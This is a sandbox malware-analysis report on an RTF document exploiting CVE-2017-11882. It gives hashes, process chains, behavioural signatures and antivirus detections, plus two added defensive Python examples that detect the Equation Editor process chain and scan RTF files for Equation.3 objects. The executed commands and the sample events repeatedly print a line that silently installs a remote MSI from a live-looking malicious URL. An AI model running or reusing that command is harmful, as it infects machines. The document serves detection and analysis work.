- * ID: 1695
- * MalFamily: "CVE-2017-11882"
- * MalScore: 10.0
- * File Name: "RTF_7bf3ae38dce045ad13937af9758c92e6.doc"
- * File Size: 267473
- * File Type: "Rich Text Format data, version 1, unknown character set"
- * SHA256: "c21659b89b91c447b63993d2a169907afa432933ce32bb07357c86134de654b8"
- * MD5: "7bf3ae38dce045ad13937af9758c92e6"
- * SHA1: "8bf693003fd3e6d7aa487317fb3b7a6651197b1e"
- * SHA512: "c577be0ca5dd1ae3d2db89d728e7d2cb59f0df5bd35d8367a1b8e33e4994cd2c60e4528be9185b843b24dbbd2156c0317b30bfac88dd51dc3fa6207a03e8d2d4"
- * CRC32: "20EE51CA"
- * SSDEEP: "1536:sxxQW3ydnXEavohq0F3BYyEau8b56acpBb:sxt3NavohHCyAYu"
- * Process Execution:
- "WINWORD.EXE",
- "services.exe",
- "svchost.exe",
- "EQNEDT32.EXE",
- "cmd.exe",
- "msiexec.exe",
- "EQNEDT32.EXE",
- "msiexec.exe",
- "svchost.exe",
- "WerFault.exe",
- "WerFault.exe",
- "WerFault.exe",
- "WerFault.exe",
- "wermgr.exe",
- "OSPPSVC.EXE",
- "svchost.exe",
- "explorer.exe",
- "dwm.exe"
- * Executed Commands:
- "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
- "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet",
- "msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet",
- "C:\\Windows\\system32\\msiexec.exe /V",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "\"C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE\"",
- "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 2388 -s 412",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2464 -s 568",
- "werfault.exe /h /shared Global\\3a008cb8a8a343b69cfbf1705af540a3",
- "C:\\Windows\\system32\\werfault.exe -pr Global\\9257F125FFD5B45B",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\""
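The command chain above (EQNEDT32.EXE, then cmd.exe /C, then msiexec.exe /i with an HTTP URL and /quiet) is the whole detection story for this sample, and the report's own EQNEDT32 signature keys on the first hop. Note the -Embedding switch on the first line: Equation Editor is started through COM activation, so on an endpoint its parent is normally svchost.exe (DcomLaunch) rather than WINWORD.EXE; a rule that only looks for Word spawning cmd.exe misses this chain, and the rule has to treat EQNEDT32.EXE itself as the suspicious parent. The Python below is an added example, not part of the report and not the sandbox's signature code: it runs three rules over constructed process-creation events modelled on this chain. The PIDs 2388 (EQNEDT32.EXE), 2124 (msiexec.exe), 3068 (WINWORD.EXE) and 1960 (explorer.exe) and the command lines come from the report; the cmd.exe PID, all parent PIDs, and the full image paths for WINWORD.EXE, cmd.exe and msiexec.exe are assumptions made to fill in the events.

```python
import ntpath
import re

# Windows Installer fetching a package over the network: msiexec /i <http(s) URL>
MSI_URL_RE = re.compile(
    r"msiexec(?:\.exe)?\b.*?[/-](?:i|package)\s+(https?://\S+)", re.I)
# /quiet, /q, /qn, /qb ...: suppress the installer UI
MSI_QUIET_RE = re.compile(r"(?<!\S)[/-]q(?:uiet|n|b|r|f)?(?!\S)", re.I)
# cmd.exe /C or /R switch as a standalone token
CMD_CHAIN_RE = re.compile(r"(?<!\S)/[cr](?!\S)", re.I)

EQNEDT32 = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
REMOTE_MSI = "http://rivercitybusinessnetwork.com/app/ywhqtj.msi"

# Constructed process-creation events modelled on the report's chain.
# PIDs 2388, 2124, 3068 and 1960 are the report's; the cmd.exe PID (2400),
# the parent PIDs and the parent/image paths are assumptions.
SAMPLE_EVENTS = [
    {"pid": 3068, "ppid": 1960, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n'},
    # COM activation: DcomLaunch (svchost.exe) starts the server with
    # -Embedding, so EQNEDT32.EXE is not a child of WINWORD.EXE.
    {"pid": 2388, "ppid": 804, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": EQNEDT32, "cmdline": f'"{EQNEDT32}" -Embedding'},
    {"pid": 2400, "ppid": 2388, "parent_image": EQNEDT32,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f"cmd.exe & /C CD C: & msiexec.exe /i {REMOTE_MSI} /quiet"},
    {"pid": 2124, "ppid": 2400, "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": f"msiexec.exe /i {REMOTE_MSI} /quiet"},
]


def _name(path):
    """Case-folded file name of a Windows path."""
    return ntpath.basename(path).lower()


def detect(events):
    """Return (severity, rule, pid, evidence) tuples for the events given."""
    findings = []
    for e in events:
        parent, child, cl = _name(e["parent_image"]), _name(e["image"]), e["cmdline"]
        # Rule 1: the sandbox's own logic. Equation Editor renders equations
        # and has no business creating processes, so any child is a hit.
        if parent == "eqnedt32.exe":
            findings.append(("high", "eqnedt32_child_process", e["pid"], f"{child}: {cl}"))
        # Rule 2: Windows Installer pulling a package over HTTP(S); a silent
        # install raises the severity.
        m = MSI_URL_RE.search(cl)
        if m:
            sev = "high" if MSI_QUIET_RE.search(cl) else "medium"
            findings.append((sev, "msiexec_remote_install", e["pid"], m.group(1)))
        # Rule 3: cmd /C with a chained command; weak on its own, useful as context.
        if child == "cmd.exe" and CMD_CHAIN_RE.search(cl) and "&" in cl:
            findings.append(("low", "cmd_c_chain", e["pid"], cl))
    return findings


def verdict(findings):
    """Highest severity among the findings, or 'clean'."""
    order = {"clean": 0, "low": 1, "medium": 2, "high": 3}
    return max((f[0] for f in findings), key=order.__getitem__, default="clean")


if __name__ == "__main__":
    for sev, rule, pid, evidence in detect(SAMPLE_EVENTS):
        print(f"[{sev:6}] {rule:24} pid={pid} {evidence}")
    print("verdict:", verdict(detect(SAMPLE_EVENTS)))
```

Rule 1 stays valid after the CVE-2017-11882 and CVE-2018-0802 patches, because a patched Equation Editor still never needs to create a process; rule 2 catches the same msiexec download-and-install trick regardless of which document format delivered it.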
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Scheduled file move on reboot detected",
- "Details":
- "File Move on Reboot": "Old: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp -> New: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer"
- "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
- "Details":
- "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
- "Description": "The RTF file contains embedded content",
- "Details":
- "embedded content": "Object 2 index 0000BF6Bh contains embedded object cT6VvSve.3 with size 3584 bytes"
- "Description": "NtCreateThreadEx: newly created thread hidden from debugger",
- "Details":
- "Description": "Anomalous file deletion behavior detected (10+)",
- "Details":
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp"
- "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref"
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "OSPPSVC.EXE"
- "process": "WINWORD.EXE"
- "Description": "A HTTP/S link was seen in a script or command line",
- "Details":
- "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
- "Description": "The RTF file has an unknown character set",
- "Details":
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
- "Description": "Sniffs keystrokes",
- "Details":
- "SetWindowsHookExW": "Process: explorer.exe(1960)"
- "Description": "Code injection with CreateRemoteThread in a remote process",
- "Details":
- "Injection": "WerFault.exe(2796) -> WINWORD.EXE(3068)"
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "Behavioural detection: Injection with CreateRemoteThread in a remote process",
- "Details":
- "Description": "Behavioural detection: Transacted Hollowing",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 1572664 times"
- "Description": "The EQNEDT32 equation process created a child process likely indicative of CVE-2017-11882 Office exploit",
- "Details":
- "created_process": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet "
- "Description": "Stack pivoting was detected when using a critical API",
- "Details":
- "process": "EQNEDT32.EXE:2388"
- "process": "msiexec.exe:2124"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$vi7zfcZsR3.doc"
- "Description": "File has been identified by 31 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Exploit.RTF-ObfsStrm.Gen"
- "FireEye": "Exploit.RTF-ObfsStrm.Gen"
- "CAT-QuickHeal": "Exp.RTF.Obfus.Gen"
- "McAfee": "Exploit-CVE2017-11882.ah"
- "Arcabit": "Exploit.RTF-ObfsStrm.Gen"
- "Symantec": "Bloodhound.RTF.12"
- "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.A"
- "TrendMicro-HouseCall": "Possible_SMBCVE20170199"
- "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
- "BitDefender": "Exploit.RTF-ObfsStrm.Gen"
- "Ad-Aware": "Exploit.RTF-ObfsStrm.Gen"
- "Emsisoft": "Exploit.RTF-ObfsStrm.Gen (B)"
- "Comodo": "Exploit.W97M.CVE2017-11882.AG@843jmy"
- "F-Secure": "Heuristic.HEUR/Rtf.Malformed"
- "DrWeb": "Exploit.Rtf.CVE2012-0158"
- "TrendMicro": "Possible_SMBCVE20170199"
- "McAfee-GW-Edition": "Exploit-CVE2017-11882.ah"
- "Sophos": "Exp/201711882-P"
- "Cyren": "CVE-2017-11882!Camelot"
- "Avira": "HEUR/Rtf.Malformed"
- "MAX": "malware (ai score=83)"
- "Antiy-AVL": "TrojanExploit/OLE.CVE-2017-11882"
- "Microsoft": "Trojan:Script/Foretype.A!ml"
- "ZoneAlarm": "HEUR:Exploit.RTF.CVE-2017-11882.gen"
- "GData": "Exploit.RTF-ObfsStrm.Gen"
- "AhnLab-V3": "RTF/Malform-C.Gen"
- "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
- "Zoner": "Probably RTFObfuscation"
- "Rising": "Exploit.CVE-2017-11882/SLT!1.AEE3 (CLASSIC)"
- "Ikarus": "Exploit.CVE-2017-11882"
- "Qihoo-360": "susp.rtf.objupdate.gen"
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "The RTF file contains an object with potential exploit code",
- "Details":
- "cve": "Object 2 index 0000BF6Bh contains Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or CVE-2018-0802)"
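The sandbox tied the embedded object to Microsoft Equation 3.0 even though the OLE object's class name had been renamed to cT6VvSve.3 (see the embedded-content signature above), so a static check cannot rely on the class name alone. The Python below is an added example, not the sandbox's code and not a substitute for oletools' rtfobj: it pulls each \*\objdata blob out of an RTF, reads the class name from the OLE 1.0 ObjectHeader, scans the native data for the Equation.3 CLSID {0002CE02-0000-0000-C000-000000000046}, and records \objclass and \objupdate (the control word that makes Word load the object when the document opens; the Qihoo-360 name in the VirusTotal list presumably refers to it). The RTF it analyzes is a constructed sample built inline, not the file from this report; placing the CLSID bytes in the filler native data is an assumption standing in for the OLE2 root directory entry that would normally carry them. Real obfuscated samples interleave junk into the hex that Word's parser tolerates and this regex extraction does not.

```python
import re
import uuid

# CLSID registered for "Equation.3" (Microsoft Equation 3.0), the COM server
# that runs as EQNEDT32.EXE. Compared in little-endian (bytes_le) layout.
EQUATION3_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")

OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]+)")
OBJCLASS_RE = re.compile(rb"\\\*\\objclass\s+([^{}\\]+)")


def ole1_class_name(blob):
    """ClassName from an OLE 1.0 ObjectHeader (MS-OLEDS 2.2.4): OLEVersion(4),
    FormatID(4), then a LengthPrefixedAnsiString whose length counts the NUL."""
    if len(blob) < 12:
        return ""
    n = int.from_bytes(blob[8:12], "little")
    if n == 0 or n > 256 or 12 + n > len(blob):
        return ""
    return blob[12:12 + n].rstrip(b"\x00").decode("latin-1", "replace")


def analyze_rtf(rtf):
    """Return the indicators that this RTF carries an Equation Editor object."""
    objects = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s", b"", m.group(1))
        if len(hexdata) % 2:          # tolerate a dangling nibble
            hexdata = hexdata[:-1]
        blob = bytes.fromhex(hexdata.decode("ascii"))
        objects.append({
            "offset": m.start(),
            "size": len(blob),
            "ole_version": int.from_bytes(blob[0:4], "little") if len(blob) >= 4 else None,
            "class_name": ole1_class_name(blob),
            "has_equation_clsid": EQUATION3_CLSID.bytes_le in blob,
            "mentions_equation": b"equation" in blob.lower(),
        })
    objclass = [c.strip().decode("latin-1") for c in OBJCLASS_RE.findall(rtf)]
    objupdate = b"\\objupdate" in rtf
    equation = any("equation" in c.lower() for c in objclass) or any(
        o["class_name"].lower().startswith("equation")
        or o["has_equation_clsid"] or o["mentions_equation"] for o in objects)
    return {"objects": objects, "objclass": objclass,
            "objupdate": objupdate, "equation_editor": equation}


def build_ole1_embedded(class_name, native):
    """Constructed OLE 1.0 EmbeddedObject: ObjectHeader + NativeDataSize + NativeData."""
    name = class_name + b"\x00"
    out = (0x501).to_bytes(4, "little")                 # OLEVersion
    out += (2).to_bytes(4, "little")                    # FormatID 2 = embedded object
    out += len(name).to_bytes(4, "little") + name       # ClassName
    out += (0).to_bytes(4, "little")                    # TopicName (empty)
    out += (0).to_bytes(4, "little")                    # ItemName (empty)
    out += len(native).to_bytes(4, "little") + native   # NativeDataSize + NativeData
    return out


# Constructed sample, not the file from the report: a minimal RTF whose only
# object is an Equation.3 embedding with \objupdate. The CLSID bytes inside
# the filler native data are an assumption standing in for an OLE2 root entry.
_NATIVE = b"\x00" * 32 + EQUATION3_CLSID.bytes_le + b"\x00" * 32
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\\ansicpg1252 Quarterly figures attached."
    b"{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
    b"{\\*\\objdata " + build_ole1_embedded(b"Equation.3", _NATIVE).hex().encode() + b"}}"
    b"}"
)

if __name__ == "__main__":
    import json
    print(json.dumps(analyze_rtf(SAMPLE_RTF), indent=2))
```

A renamed class name, as in this report, leaves class_name useless but keeps the CLSID and \objupdate indicators; treating any of the three as sufficient is the point of the combined verdict.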
- * Started Service:
- "osppsvc",
- "msiserver",
- "WerSvc"
- * Mutexes:
- "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
- "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
- "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Global\\_MSIExecute",
- "Local\\WERReportingForProcess2388",
- "Global\\ca344605-d57d-11e9-8070-18c086cd4729",
- "Local\\WERReportingForProcess2464",
- "Global\\\\xe5\\x88\\x90\\xc7\\x9a",
- "Local\\WERReportingForProcess3068",
- "Global\\e6da076c-d57d-11e9-8070-18c086cd4729",
- "Global\\\\xed\\xac\\xb0\\xcd\\x9e",
- "WERUI_APPCRASH-c6a08aebbdac3f74ea291cf85a7fb8436eb98a5"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\mnvi7zfcZsR3.doc",
- "C:\\Users\\user\\AppData\\Local\\Temp\\~$vi7zfcZsR3.doc",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRFFC3B42BF-0963-4DFD-8D4D-A3DC30366FA7.tmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS862D9AF4-6C86-4A2B-9EAC-76489E7C8F83.tmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS8526D782-2370-4052-99E7-C3D049572C10.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB4EA.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB5B6.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB615.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERBE44.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\Report.wer",
- "C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat",
- "\\??\\PIPE\\srvsvc",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER6E47.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER727E.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER731C.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WERA75C.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\CVR9656.tmp.cvr",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WERADB2.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WERD918.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER16CE.tmp.xml",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER17B9.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER44B6.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\Report.wer",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml",
